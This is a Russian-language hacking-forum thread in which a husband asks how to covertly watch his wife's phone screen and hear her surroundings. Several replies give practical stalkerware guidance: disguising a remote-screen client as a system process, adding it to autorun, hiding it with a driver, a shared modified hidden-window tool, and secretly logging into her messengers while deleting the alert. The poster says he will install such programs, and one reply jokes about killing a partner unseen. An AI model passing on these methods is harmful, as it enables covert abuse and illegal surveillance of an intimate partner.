Следить за телефоном

Discussion in 'Песочница' started by I love h@@ck, 10 Jan 2019.

  1. I love h@@ck

    I love h@@ck New Member

    Joined:
    3 Jan 2010
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Приветствую.
    Мужики просто прошу помощи разобраться в такой вот ситуации
    Женат. Сам много работаю. Часто не бываю дома.
    Чувствую что половина моя, не совсем честна со мной. Не то что бы изменяет, но переписывается возможно с кем то. Те кто в браке думаю меня поймут. Жить во лжи не хочется, но в технике я, увы, на уровне любителя.
    У всех у нас лучший друг телефон. У неё, свежий самсунг.
    Мессенджеров много и переписки имеют возможность удалятся.
    В идеале, хотелось бы в любой момент видеть её экран на расстоянии.
    Ну или слышать что происходит. Естественно, чтобы она ничего не знала.
    Не прошу каких то услуг по взлому, всё не взломаешь. Хотя бы просто совет по примерно изложенной проблеме.
    На форуме регистрировался давно, ещё подростком. Почему то первая мысль написать именно сюда
    Буду рад любой отписки. Всех с праздниками.
     
  2. DartPhoenix

    DartPhoenix Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    1,095
    Likes Received:
    8,413
    Reputations:
    25
    Если имеетя прямой доступ к компу можно поставить скрытый клиент. Тут еще зависит от ее скилла.
    1) Если скилла у нее нет - можно поискать где-то на форумах исходники. Из них лучше компилить, чтобы сюрприз не подхватить, но можно и поискать если жажда приключений зовет. Вот первое что я нагуглил но понятия не имею есть там сюрпризы или нет.
    2) Если скилл такой себе средний - то можно просто переименоваться в какой-нибудь sqlwriter.exe, заменить иконку посредством Resource Hacker на злобные шестереночки и забросить в папку с Вендой и в автозагрузку его.

    3) Если она хацкер - тогда надо писать дровишко, который бы скрывал юзермодную тулзу из списка процессов (и себя из списка дров), заодно шифровать соединение, можно даже стеганографию использовать и портнокинг :) Как вариант - пропатчить одну из постоянно используемых программ, это попроще. Ну там... realteck audio и.т.п.
    ======================
    Самый реальный вариант для полного нуба - гуглить готовое, чуть сложнее - поменять иконку и прописать в авторан, еще сложнее (но безопаснее) скомпилить самому если умеешь. Остальное уже не факт что кто-то даст бесплатно, а если это к п.3 - то ушь совсем не факт :)
    ======================
    UPD: скачал, дописал "Application.ShowMainForm := false;", откомпилил. Больше ничего не смотрел. Можно юзать на свой страх и риск. https://ru.files.fm/u/re8cmdb8

    Рекомендуется переименовать v1ServerVD во что-нибудь милое и запихнуть в автозагрузку. Для использования запускается клиент, указывается айпи на который установлен сервер, потом Connect и ShowScreen.

    Если использоваться будет нелегально - берегите жопу, становитесь спиной к стеночке :)
     
    #2 DartPhoenix, 10 Jan 2019
    Last edited: 10 Jan 2019
    Zroot and user100 like this.
  3. PCD

    PCD Banned

    Joined:
    6 Jan 2019
    Messages:
    14
    Likes Received:
    14
    Reputations:
    3
    Как вариант можно авторизоваться под ее мессенджерами со своего телефона (желательно со 2го на андроиде). Например в вк ( и удали у нее сообщение от контакта, там написано будет в смс и уведомление)

    Суть такова, ты будешь все читать и видеть - уведомления и тебе и ей придут!

    2й вариант бессмысленно, нужно запилить ботнет. Про него писать здесь на форуме не буду.
     
    #3 PCD, 10 Jan 2019
    Last edited: 10 Jan 2019
    Turanchocks_ likes this.
  4. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    _________________________
  5. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,374
    Likes Received:
    1,092
    Reputations:
    356
    Это уже звонок. Может сесть подумать спокойно и поговорить? Рявкнуть и построить. Не построилась, значит пусть сдает матрац и возвращается к маме.
     
    _________________________
  6. DartPhoenix

    DartPhoenix Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    1,095
    Likes Received:
    8,413
    Reputations:
    25
    Было-бы все так просто...
    ==========
    Меня как-то и Павлом называли и Алексеем в момент таксказать радости... И кстати сия ревность позволяет сделать этот момент острее. А потом я делаю вид что не услышал а дамочка делает вид что ничего и не говорила... Но если ты с ней живешь - то это повод купить рулетку. Чтобы было чем измерить длину рог хотя-бы. Чтобы замерить ветвистость - нужно строить граф.
     
  7. Clicklead

    Clicklead New Member

    Joined:
    11 Jan 2019
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Попробуйте стандартные фичи по типу поиска телефона, на удаленке будете следить, иконка с рабочего стола удаляется, без рута она не выпилит приложение. Но вы все будете видеть через вебинтерфейс, даже голос и фронт-камеру.
     
    I love h@@ck likes this.
  8. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,374
    Likes Received:
    1,092
    Reputations:
    356
    практика показывает, что после приобретенного опыта это становится просто. А первый раз да, хочется следить, выяснять, уточнять, верить оправданиям.
    Надо садиться и разговаривать. И иметь в себе мужество делать нужные шаги, если там всё.
     
    _________________________
    Turanchocks_ likes this.
  9. DartPhoenix

    DartPhoenix Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    1,095
    Likes Received:
    8,413
    Reputations:
    25
    Я так и не сделал. Сделал как обычно...
    Если мне надо распрощаться с подругой - я просто становлюсь охуенным говнюком. То мне не так, это не эдак... а потом я просто симулировал отсутствие денег на съем квартиры. Подруга осерчала и я услышал полное подтверждение своей версии. Ну можно бы и поорать но... это просто лишняя суета. Ее можно и уработать в канаве и никто не узнает кто это сделал. Но нахуй надо ? :)

    Практика подсказывает что надо прежде всего узнать чего ей от тебя надо. И мониторить этот момент. Но тут глухо. Ключевое слово "подруги". Подруги ее научат как правильно делать и с этим ты ничего не поделаешь. Это как с детьми. Отдашь в неправильную школу и... заебешься воспитывать. Но детей еще можно а с подругой - уже не очень. Она гражданин. Она твоя одногодка. Ее защищает общественная мораль и государство. Ты в меньшинстве :)
     
    I love h@@ck likes this.
  10. I love h@@ck

    I love h@@ck New Member

    Joined:
    3 Jan 2010
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Ребята всем спасибо за ответы. Уже выбрал для себя пару программ. Как будет возможность сразу установлю ей на телефон.
    Уже отправил запрос в тех поддержку вк на получение архива gdpr
    Спасибо ещё раз.
    Тему я буду смотреть если кто-то что-то предложит ещё я присмотрюсь.
     
  11. I love h@@ck

    I love h@@ck New Member

    Joined:
    3 Jan 2010
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Рявкать, ругаться, переучивать... Это взрослый человек, не ребенок, не собака. Он уже сложен. Ломать, мое мнение, бессмысленно. Всё говно изнутри все равно всплывет. дело времени.
     
    PCD likes this.
  12. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,374
    Likes Received:
    1,092
    Reputations:
    356
    Надо прежде всего знать, надо ли оно ТЕБЕ это.
    I love h@@ck говорить об этом как раз. И уяснить для себя надо ли оно тебе такое, готов ли с этим мириться. И говорить как раз об этом. Говори - дорогая, вот я вижу что ты занимаешься какой-то, по моему мнению хуйней. Я не готов с этим примириться. Теперь объясни мне что это за хуйня и что НАМ с этим делать. Ну и там по результату уже. Но для себя ты уже должен решить готов ли ты идти до конца или будешь мямлить и верить левым отмазам.
    Удачи.
     
    _________________________
    Turanchocks_ likes this.
  13. DartPhoenix

    DartPhoenix Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    1,095
    Likes Received:
    8,413
    Reputations:
    25
    Раз жить начал - значит было надо. Впоследствии ты обрастаешь обязанностями и уже вопрос надо-ли оно тебе - не возникает. Тебя никто не спрашивал. У тебя есть выбор взять и уйти но правда последствия этого не очень хороши. Ты уйдешь а у тебя там начнет дома крыша протекать, шкафчик покосится (я такое видел у одной...) и все такое прочее. Когда где-то проживешь некоторое время - внезапно ты открываешь глаза и понимаешь что тебя связали. А потому как-то и не очень хочется задавать такие вопросы тем более ответы на них не так точны... Если бы я имел дело с копией себя - не было - бы никаких проблем. У меня все прямо и перпендикулярно обычно. Либо Да - либо Нет. True и False. Когда ты имеешь дело с дамочками - у них основной ответ "Может Быть" :) Они и сами дупля не отстреливают что надо а что нет и как надо и зачем. Это такой себе ходячий рандом генератор. И правду сей генератор говорит очень редко а если и говорит - то ты хрен чего поймешь ибо она и сама ничерта не понимает :)

    Твоя забота узнать какого хрена ей от тебя требуется. Может быть ты служишь просто трамплином к светлому будщему. Кто ж тебе скажет что ты просто трамплин ? Это же нелогично. Откровенный разговор по душам с шулером - милая картина, но бесперспективная :) Невиновная самочка почувствует себя оскорбленной, виновная - один хрен не признается. О чем говорить ?
     
    I love h@@ck and Turanchocks_ like this.
  14. PCD

    PCD Banned

    Joined:
    6 Jan 2019
    Messages:
    14
    Likes Received:
    14
    Reputations:
    3
    Еще дам тебе 1 дельный совет.
    Ты хочешь не думать о том, изменяет или нет?
    Общается или нет?

    Просто найди работу там где живешь! Как нормальный человек просыпайся к 9 и до 6, суббота и воскр. выходные.
    И париться не будешь точно!
     
  15. PCD

    PCD Banned

    Joined:
    6 Jan 2019
    Messages:
    14
    Likes Received:
    14
    Reputations:
    3
    Знай друг - ты творец своей жизни!

    Если не желаешь так, тогда не нужно бегать и спрашивать советы слежки.
    Значит тебе пофиг, как и с кем она.

    Расставляй приоритеты, хочешь норм семьи - найди работу, пусть денег меньше но будешь с ней всегда.
     
Loading...
Similar Threads - Следить телефоном
  1. u_r_an_1d10t
    Replies:
    2
    Views:
    3,540